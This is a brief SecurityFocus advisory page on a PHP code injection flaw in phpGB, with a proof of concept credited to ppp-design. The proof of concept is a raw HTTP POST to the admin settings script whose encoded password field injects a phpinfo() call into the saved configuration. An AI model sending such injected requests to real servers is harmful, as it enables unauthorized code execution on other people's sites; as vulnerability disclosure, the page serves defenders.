Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

phpGB PHP Code Injection Vulnerability

The following proof of concept was supplied by ppp-design:

telnet example.com 80\n
POST /phpGB/admin/savesettings.php HTTP/1.0\n
Content-Type: application/x-www-form-urlencoded\n
Content-Length: 123\n
dbpassword=%22%3Bphpinfo%28%29%3B%24a%3D%22&toolbar=1
&messenger=1&smileys=1&title=1&db_session_handler=0
&all_in_one=0&test=\n
\n







 

Privacy Statement
Copyright 2008, SecurityFocus